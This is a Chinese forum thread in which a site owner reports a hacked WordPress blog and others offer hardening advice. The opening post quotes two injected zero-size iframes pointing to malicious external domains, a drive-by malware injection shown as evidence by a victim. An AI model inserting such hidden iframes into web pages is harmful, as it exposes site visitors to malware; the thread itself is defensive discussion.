我的wordpress被黑了

2013-05-06 23:07:06 +08:00
 jiangle
</body><iframe src="http://boogyman.biz.ua/?1" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://booghoot.com/?6" width="0" height="0" frameborder="0"></iframe>

底部多了两行代码,而且用firefox打开之后提示“ 攻击站点”
3052 次点击
所在节点    问与答
6 条回复
gracece
2013-05-07 00:14:35 +08:00
谷歌访问也提示危险。
wp是这么不安全吗,老是听到有人被黑了。
liuhang0077
2013-05-07 00:29:51 +08:00
@gracece 用的人多了总会有很多问题~~
fx
2013-05-07 00:34:02 +08:00
也可能是操作系统有漏洞
cst4you
2013-05-07 03:33:32 +08:00
请立刻检查 wp-content 里特别是 plugins 目录是否被上传了木马.
还有根目录是否有 xmirpc.php 注意是 "i" 不是 "l".

你遇到的攻击挂马方法跟我遇到的有点类似. 起初我手动把模版改回去, 不到1小时, 又被他写回去了.
后来经过几天的博弈, 我把目录安全什么的都做过了, 还是被写.
最后使了招狠的, 把 wp-includes/general-template.php 里调用的 header footer的默认模版改名. 让wp读取其他模版文件.
然后把原来的 header footer 复制一份并且改名成不起眼但是很多一样系列的文件名(例如content-xxx, search什么的, 反正尽量混淆视线).
一般无脑的工具党就会发现怎么改 header footer 都不生效从而放弃(至少我那次遇到的就是这样的).

再后来我禁止了 wp-content 里所有php文件的直接访问. 并且对这个目录的访问做了单独的 access_log.
现在每天都能看到不少的人在尝试通过 wp-content 的插件漏洞在提权. 至少到现在我们再没有遇到像上次这样被硬改模版的情况.
BOYPT
2013-05-07 09:43:05 +08:00
据说w3tc / super cache 两个插件的最新版本之前都存在漏洞,如果用到的先升级到最新吧。
TankyWoo
2013-05-07 18:32:57 +08:00
不一定是你本身的问题,我的wp以前也被挂了一条暗链(用的虚拟主机)

后来发现同ip下好多wp都被挂了,所以我怀疑是母鸡被人攻入了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/67960

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX